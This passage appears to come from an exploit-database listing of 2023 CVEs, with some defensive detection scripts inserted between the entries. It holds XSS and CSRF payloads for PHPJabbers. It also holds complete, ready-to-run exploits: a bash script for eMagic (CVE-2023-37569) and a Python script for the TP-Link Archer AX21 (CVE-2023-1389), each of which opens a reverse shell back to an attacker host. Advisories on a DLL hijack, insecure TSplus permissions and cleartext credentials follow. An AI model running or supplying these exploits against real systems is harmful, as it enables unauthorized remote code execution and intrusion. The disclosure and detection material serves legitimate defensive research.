      URL path folder is vulnerable to XSS

      https://website/classifieds[XSS]/search?category=1
      https://website/classifieds/search[XSS]?category=1

      XSS Payloads:

      ijz3y"><img src=a onerror=alert(1)>y4apk

      [-] Done
  19. # Exploit Title: PHPJabbers Vacation Rental Script 4.0 - CSRF
      # Date: 05/08/2023
      # Exploit Author: Hasan Ali YILDIR
      # Vendor Homepage: https://www.phpjabbers.com/
      # Software Link: https://www.phpjabbers.com/vacation-rental-script/
      # Version: 4.0
      # Tested on: Windows 10 Pro

      ## Description

      An attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

      Technical Detail / POC
      ==========================
      1. Login Account
      2. Go to Property Page (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate)
      3. Edit Any Property (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21)

      [1] Cross-Site Request Forgery

      Request:
      https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21&tab="<script><font%20color="red">CSRF%20test</font>

      [2] Cross-Site Scripting (XSS)

      Request:
      https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21&tab="<script><image/src/onerror=prompt(8)>
  20. #!/bin/bash

      # Exploit Title: Emagic Data Center Management Suite v6.0 - OS Command Injection
      # Date: 03-08-2023
      # Exploit Author: Shubham Pandey & thewhiteh4t
      # Vendor Homepage: https://www.esds.co.in/enlight360
      # Version: 6.0.0
      # Tested on: Kali Linux
      # CVE : CVE-2023-37569

      URL=$1
      LHOST=$2
      LPORT=$3

      echo "*****************************"
      echo "*   ESDS eMagic 6.0.0 RCE   *"
      echo "*   > CVE-2023-37569        *"
      echo "*   > Shubham & thewhiteh4t *"
      echo "*****************************"

      if [ $# -lt 3 ]; then
          echo """
      USAGE : ./exploit.sh http://<IP> <LHOST> <LPORT>
              ./exploit.sh http://192.168.0.10 192.168.0.20 1337
      """
          exit 1
      fi

      url="$1/index.php/monitor/operations/utilities/"

      echo "[+] URL   : $URL"
      echo "[+] LHOST : $LHOST"
      echo "[+] LPORT : $LPORT"
      echo

      payload="bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%27"
      post_data="utility=ping&operations=yes&hostname=%3B%20$payload&param_before=&param_after=&probe_id=1&rndval=1682490204846"

      echo "[!] Triggering exploit..."
      echo $url
      (sleep 3; curl -s -X POST -d $post_data $url > /dev/null) &
      echo "[+] Catching shell..."
      nc -lvp 4444
  21. #!/usr/bin/python3
      #
      # Exploit Title: TP-Link Archer AX21 - Unauthenticated Command Injection
      # Date: 07/25/2023
      # Exploit Author: Voyag3r (https://github.com/Voyag3r-Security)
      # Vendor Homepage: https://www.tp-link.com/us/
      # Version: TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 (https://www.tenable.com/cve/CVE-2023-1389)
      # Tested On: Firmware Version 2.1.5 Build 20211231 rel.73898(5553); Hardware Version Archer AX21 v2.0
      # CVE: CVE-2023-1389
      #
      # Disclaimer: This script is intended to be used for educational purposes only.
      # Do not run this against any system that you do not have permission to test.
      # The author will not be held responsible for any use or damage caused by this
      # program.
      #
      # CVE-2023-1389 is an unauthenticated command injection vulnerability in the web
      # management interface of the TP-Link Archer AX21 (AX1800), specifically, in the
      # *country* parameter of the *write* callback for the *country* form at the
      # "/cgi-bin/luci/;stok=/locale" endpoint. By modifying the country parameter it is
      # possible to run commands as root. Execution requires sending the request twice;
      # the first request sets the command in the *country* value, and the second request
      # (which can be identical or not) executes it.
      #
      # This script is a short proof of concept to obtain a reverse shell. To read more
      # about the development of this script, you can read the blog post here:
      # https://medium.com/@voyag3r-security/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94
      # Before running the script, start a nc listener on your preferred port -> run the script -> profit

      import requests, urllib.parse, argparse
      from requests.packages.urllib3.exceptions import InsecureRequestWarning

      # Suppress warning for connecting to a router with a self-signed certificate
      requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

      # Take user input for the router IP, and attacker IP and port
      parser = argparse.ArgumentParser()
      parser.add_argument("-r", "--router", dest = "router", default = "192.168.0.1", help="Router name")
      parser.add_argument("-a", "--attacker", dest = "attacker", default = "127.0.0.1", help="Attacker IP")
      parser.add_argument("-p", "--port",dest = "port", default = "9999", help="Local port")
      args = parser.parse_args()

      # Generate the reverse shell command with the attacker IP and port
      revshell = urllib.parse.quote("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + args.attacker + " " + args.port + " >/tmp/f")

      # URL to obtain the reverse shell
      url_command = "https://" + args.router + "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(" + revshell + ")"

      # Send the URL twice to run the command. Sending twice is necessary for the attack
      r = requests.get(url_command, verify=False)
      r = requests.get(url_command, verify=False)
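A defender-side companion to the advisory above, added here and not part of the original post: it scans web-server access-log lines for the CVE-2023-1389 request shape (a write to the country form at /cgi-bin/luci/;stok=/locale whose country value carries shell metacharacters) and reports clients that sent it twice, which the advisory notes is required for execution. The log lines are constructed sample data.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

LOCALE_ENDPOINT = "/cgi-bin/luci/;stok=/locale"
# Characters that never belong in a country code but do in a shell payload.
SHELL_META = re.compile(r"[`$;|&<>]")
# Request line inside a Common/Combined Log Format entry.
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

# Constructed sample log: one legitimate write, two injection-shaped writes
# from the same client, plus unrelated traffic.
SAMPLE_LOG = [
    '192.168.0.23 - - [25/Jul/2023:10:00:01 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=read HTTP/1.1" 200 512',
    '192.168.0.23 - - [25/Jul/2023:10:00:05 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=US HTTP/1.1" 200 64',
    '192.168.0.99 - - [25/Jul/2023:10:01:10 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id) HTTP/1.1" 200 64',
    '192.168.0.99 - - [25/Jul/2023:10:01:11 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id) HTTP/1.1" 200 64',
    '192.168.0.23 - - [25/Jul/2023:10:02:00 +0000] "GET /webpages/index.html HTTP/1.1" 200 8192',
]

def country_write_value(request_target):
    """Return the decoded 'country' value of a country-form write, else None."""
    parts = urlsplit(request_target)   # urlsplit keeps ';stok=' inside the path
    if not parts.path.startswith(LOCALE_ENDPOINT):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("form") != ["country"] or qs.get("operation") != ["write"]:
        return None
    return qs["country"][0] if qs.get("country") else None

def scan_access_log(lines):
    """Return (line_no, client_ip, country_value) for each injection-shaped write."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        country = country_write_value(m.group(1))
        if country is not None and SHELL_META.search(country):
            hits.append((n, line.split()[0], country))
    return hits

def repeat_senders(hits):
    """Clients that sent an injection-shaped write at least twice."""
    counts = Counter(ip for _, ip, _ in hits)
    return sorted(ip for ip, c in counts.items() if c >= 2)
```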
  22. # Exploit Title: OutSystems Service Studio 11.53.30 - DLL Hijacking
      # Date: 2023-08-09
      # Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia
      # Vendor Homepage: https://www.outsystems.com/
      # Version: Up to 11.53.30 (Build 61739)
      # Tested on: Windows
      # CVE : CVE-2022-47636

      A DLL hijacking vulnerability has been discovered in OutSystems Service Studio 11 11.53.30 build 61739. When a user opens a .oml file (OutSystems Modeling Language), the application will load the following DLLs from the same directory:

      av_libGLESv2.dll
      libcef.DLL
      user32.dll
      d3d10warp.dll

      Using a crafted DLL, it is possible to execute arbitrary code in the context of the currently logged-in user.
  23. # Exploit Title: TSplus 16.0.2.14 - Remote Access Insecure Files and Folders Permissions
      # Date: 2023-08-09
      # Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia
      # Vendor Homepage: https://tsplus.net/
      # Version: Up to 16.0.2.14
      # Tested on: Windows
      # CVE : CVE-2023-31067

      TSplus Remote Access (v. 16.0.2.14) is an alternative to Citrix and Microsoft RDS for remote desktop access and Windows application delivery. Web-enable your legacy apps, create SaaS solutions or remotely access your centralized corporate tools and files.

      The TSplus Remote Access solution comes with an embedded web server to allow remote users to easily connect remotely. However, insecure file and folder permissions are set and this could allow a malicious user to manipulate file content (e.g.: changing the code of html pages or js scripts) or change legitimate files (e.g. Setup-VirtualPrinter-Client.exe) in order to compromise a system or to gain elevated privileges.

      This is the list of insecure files and folders with their respective permissions: Everyone:(OI)(CI)(F) and Everyone:(F)

      Permission: Everyone:(OI)(CI)(F)

      C:\Program Files (x86)\TSplus\Clients\www
      C:\Program Files (x86)\TSplus\Clients\www\addons
      C:\Program Files (x86)\TSplus\Clients\www\ConnectionClient
      C:\Program Files (x86)\TSplus\Clients\www\downloads
      C:\Program Files (x86)\TSplus\Clients\www\prints
      C:\Program Files (x86)\TSplus\Clients\www\RemoteAppClient
      C:\Program Files (x86)\TSplus\Clients\www\software
      C:\Program Files (x86)\TSplus\Clients\www\var
      C:\Program Files (x86)\TSplus\Clients\www\cgi-bin\remoteapp
      C:\Program Files (x86)\TSplus\Clients\www\downloads\shared
      C:\Program Files (x86)\TSplus\Clients\www\software\java
      C:\Program Files (x86)\TSplus\Clients\www\software\js
      C:\Program Files (x86)\TSplus\Clients\www\software\html5\jwres
      C:\Program Files (x86)\TSplus\Clients\www\software\html5\locales
      C:\Program Files (x86)\TSplus\Clients\www\software\html5\imgs\topmenu
      C:\Program Files (x86)\TSplus\Clients\www\software\html5\imgs\key\parts
      C:\Program Files (x86)\TSplus\Clients\www\software\java\img
      C:\Program Files (x86)\TSplus\Clients\www\software\java\third
      C:\Program Files (x86)\TSplus\Clients\www\software\java\img\cp
      C:\Program Files (x86)\TSplus\Clients\www\software\java\img\srv
      C:\Program Files (x86)\TSplus\Clients\www\software\java\third\images
      C:\Program Files (x86)\TSplus\Clients\www\software\java\third\js
      C:\Program Files (x86)\TSplus\Clients\www\software\java\third\images\bramus
      C:\Program Files (x86)\TSplus\Clients\www\software\java\third\js\prototype
      C:\Program Files (x86)\TSplus\Clients\www\var\log
      C:\Program Files (x86)\TSplus\UserDesktop\themes
      C:\Program Files (x86)\TSplus\UserDesktop\themes\BlueBar
      C:\Program Files (x86)\TSplus\UserDesktop\themes\Default
      C:\Program Files (x86)\TSplus\UserDesktop\themes\GreyBar
      C:\Program Files (x86)\TSplus\UserDesktop\themes\Logon
      C:\Program Files (x86)\TSplus\UserDesktop\themes\MenuOnTop
      C:\Program Files (x86)\TSplus\UserDesktop\themes\Seamless
      C:\Program Files (x86)\TSplus\UserDesktop\themes\ThinClient
      C:\Program Files (x86)\TSplus\UserDesktop\themes\Vista

      ------------------------------------------------------------------------------

      Permission: Everyone:(F)

      C:\Program Files (x86)\TSplus\Clients\www\all.min.css
      C:\Program Files (x86)\TSplus\Clients\www\custom.css
      C:\Program Files (x86)\TSplus\Clients\www\popins.css
      C:\Program Files (x86)\TSplus\Clients\www\robots.txt
      C:\Program Files (x86)\TSplus\Clients\www\addons\Setup-VirtualPrinter-Client.exe
      C:\Program Files (x86)\TSplus\Clients\www\cgi-bin\hb.exe.config
      C:\Program Files (x86)\TSplus\Clients\www\cgi-bin\SessionPrelaunch.Common.dll.config
      C:\Program Files (x86)\TSplus\Clients\www\cgi-bin\remoteapp\index.html
      C:\Program Files (x86)\TSplus\Clients\www\RemoteAppClient\index.html
      C:\Program Files (x86)\TSplus\Clients\www\software\common.css
      C:\Program Files (x86)\TSplus\Clients\www\software\html5\jwres\jwwebsockify.jar
      C:\Program Files (x86)\TSplus\Clients\www\software\html5\jwres\web.jar
      C:\Program Files (x86)\TSplus\Clients\www\software\html5\own\exitlist.html
      C:\Program Files (x86)\TSplus\Clients\www\software\html5\own\exitupload.html
      C:\Program Files (x86)\TSplus\Clients\www\software\html5\own\getlist.html
      C:\Program Files (x86)\TSplus\Clients\www\software\html5\own\getupload.html
      C:\Program Files (x86)\TSplus\Clients\www\software\html5\own\postupload.html
      C:\Program Files (x86)\TSplus\Clients\www\software\html5\own\uploaderr.html
      C:\Program Files (x86)\TSplus\Clients\www\software\java\index.html
      C:\Program Files (x86)\TSplus\Clients\www\software\java\img\index.html
      C:\Program Files (x86)\TSplus\Clients\www\software\java\img\port.bin
      C:\Program Files (x86)\TSplus\Clients\www\software\java\third\jws.js
      C:\Program Files (x86)\TSplus\Clients\www\software\java\third\sha256.js
      C:\Program Files (x86)\TSplus\Clients\www\software\java\third\js\prototype\prototype.js
      C:\Program Files (x86)\TSplus\Clients\www\software\js\jquery.min.js
  24. # Exploit Title: TSplus 16.0.0.0 - Remote Work Insecure Files and Folders Permissions
      # Date: 2023-08-09
      # Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia
      # Vendor Homepage: https://tsplus.net/
      # Version: Up to 16.0.0.0
      # Tested on: Windows
      # CVE : CVE-2023-31068

      With TSPlus Remote Work (v. 16.0.0.0) you can create a secure single sign-on web portal and remote desktop gateway that enables users to remotely access the console session of their office PC.

      The solution comes with an embedded web server to allow remote users to easily connect remotely. However, insecure file and folder permissions are set, and this could allow a malicious user to manipulate file content (e.g.: changing the code of html pages or js scripts) or change legitimate files (e.g. Setup-RemoteWork-Client.exe) in order to compromise a system or to gain elevated privileges.

      This is the list of insecure files and folders with their respective permissions:

      Permission: Everyone:(OI)(CI)(F)

      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloads
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\prints
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\var
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\remoteapp
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloads\shared
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\js
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\locales
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\own
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\des
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\key
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\topmenu
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\key\parts
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img\cp
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img\srv
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\images
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\js
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\images\bramus
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\js\prototype
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\var\log

      -------------------------------------------------------------------------------------------

      Permission: Everyone:(F)

      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\robots.txt
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\hb.exe.config
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\SessionPrelaunch.Common.dll.config
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\remoteapp\index.html
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\common.js
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\lang.js
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\Setup-RemoteWork-Client.exe
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres\jwwebsockify.jar
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres\web.jar
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\own\exitlist.html
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\own\exitupload.html
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\index.html
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img\index.html
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img\port.bin
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\jws.js
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\sha256.js
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\js\prototype\prototype.js
      C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\js\jquery.min.js
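An audit helper for both TSplus permission advisories above (Remote Access and Remote Work), added here and not part of either original post: it parses icacls-style output for the listed paths and reports every entry where the Everyone principal holds Full control (F) or Modify (M), which is the condition the advisories describe. The icacls text is constructed sample data.

```python
import re

# icacls prints the path and its first ACE on one line and indents the remaining
# ACEs for that path on continuation lines (no path). Principals may carry a
# domain prefix (BUILTIN\Users) or contain a space (NT AUTHORITY\SYSTEM).
ACE_LINE = re.compile(
    r"^\s*(?:(?P<path>\S.*?)\s+)??"
    r"(?P<principal>(?:NT AUTHORITY|NT SERVICE|CREATOR OWNER|[\w.\-]+)(?:\\[\w.\- ]+)?)"
    r":(?P<rights>(?:\([A-Z,]+\))+)\s*$"
)
WEAK_RIGHTS = re.compile(r"\((?:F|M)\)")   # Full control or Modify

# Constructed sample output, in the layout icacls uses.
SAMPLE_ICACLS = r"""
C:\Program Files (x86)\TSplus\Clients\www Everyone:(OI)(CI)(F)
                                          NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                          BUILTIN\Administrators:(I)(OI)(CI)(F)
C:\Program Files (x86)\TSplus\Clients\www\addons\Setup-VirtualPrinter-Client.exe Everyone:(F)
C:\Program Files (x86)\TSplus\Clients\www\index.html NT AUTHORITY\SYSTEM:(I)(F)
                                                     BUILTIN\Administrators:(I)(F)
                                                     BUILTIN\Users:(I)(RX)

Successfully processed 3 files; Failed processing 0 files
"""

def parse_icacls(output):
    """Return (path, principal, rights) for every ACE in the output."""
    entries, path = [], None
    for line in output.splitlines():
        m = ACE_LINE.match(line)
        if not m:
            continue                     # blank line, summary line, other text
        path = m.group("path") or path   # continuation lines reuse the last path
        if path is not None:
            entries.append((path, m.group("principal"), m.group("rights")))
    return entries

def everyone_writable(output):
    """Paths where Everyone has (F) or (M); inherited ACEs, marked (I), count too."""
    return [(path, rights) for path, who, rights in parse_icacls(output)
            if who.lower() == "everyone" and WEAK_RIGHTS.search(rights)]
```

On a live system the same functions can be fed the output of `icacls "C:\Program Files (x86)\TSplus\Clients\www" /t`.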
  25. # Exploit Title: TSPlus 16.0.0.0 - Remote Work Insecure Credential storage
      # Date: 2023-08-09
      # Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia
      # Vendor Homepage: https://tsplus.net/
      # Version: Up to 16.0.0.0
      # Tested on: Windows
      # CVE : CVE-2023-31069

      With TSPlus Remote Work (v. 16.0.0.0) you can create a secure single sign-on web portal and remote desktop gateway that enables users to remotely access the console session of their office PC.

      It is possible to create a custom web portal login page which allows a user to login without providing their credentials. However, the credentials are stored in an insecure manner since they are saved in cleartext, within the html login page. This means that everyone with access to the web login page can easily retrieve the credentials to access the application by simply looking at the HTML source of the page.

      This is a code snippet extracted from the source code of the login page (var user and var pass):

      // --------------- Access Configuration ---------------
      var user = "Admin"; // Login to use when connecting to the remote server (leave "" to use the login typed in this page)
      var pass = "SuperSecretPassword"; // Password to use when connecting to the remote server (leave "" to use the password typed in this page)
      var domain = ""; // Domain to use when connecting to the remote server (leave "" to use the domain typed in this page)
      var server = "127.0.0.1"; // Server to connect to (leave "" to use localhost and/or the server chosen in this page)
      var port = ""; // Port to connect to (leave "" to use localhost and/or the port of the server chosen in this page)
      var lang = "as_browser"; // Language to use
      var serverhtml5 = "127.0.0.1"; // Server to connect to, when using HTML5 client
      var porthtml5 = "3389"; // Port to connect to, when using HTML5 client
      var cmdline = ""; // Optional text that will be put in the server's clipboard once connected
      // --------------- End of Access Configuration ---------------
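A check for the condition described above, added here and not part of the original post: it reads a saved copy of the custom login page, extracts the "Access Configuration" variables, and reports the credential-bearing ones that are populated rather than left as "". The HTML is a constructed sample in the same shape as the advisory's snippet, with placeholder values.

```python
import re

# JS assignments of the form:  var name = "value";  (an empty value is allowed)
CONFIG_VAR = re.compile(r'\bvar\s+(\w+)\s*=\s*"([^"]*)"\s*;')
# Variables that must stay "" on any page served to browsers.
SECRET_VARS = ("user", "pass", "domain")

# Constructed sample page; values are placeholders.
SAMPLE_LOGIN_PAGE = """\
<script>
// --------------- Access Configuration ---------------
var user = "Admin";            // Login to use when connecting to the remote server
var pass = "PLACEHOLDER_PW";   // Password to use when connecting to the remote server
var domain = "";               // Domain to use when connecting to the remote server
var server = "127.0.0.1";      // Server to connect to
var lang = "as_browser";       // Language to use
// --------------- End of Access Configuration ---------------
</script>
"""

def access_configuration(html):
    """Return {name: value} for every config variable found in the page."""
    return {name: value for name, value in CONFIG_VAR.findall(html)}

def embedded_credentials(html):
    """Return the names of secret-bearing variables that carry a non-empty value."""
    cfg = access_configuration(html)
    return sorted(name for name in SECRET_VARS if cfg.get(name))

def is_safe(html):
    """True when no credential is embedded in the served page."""
    return not embedded_credentials(html)
```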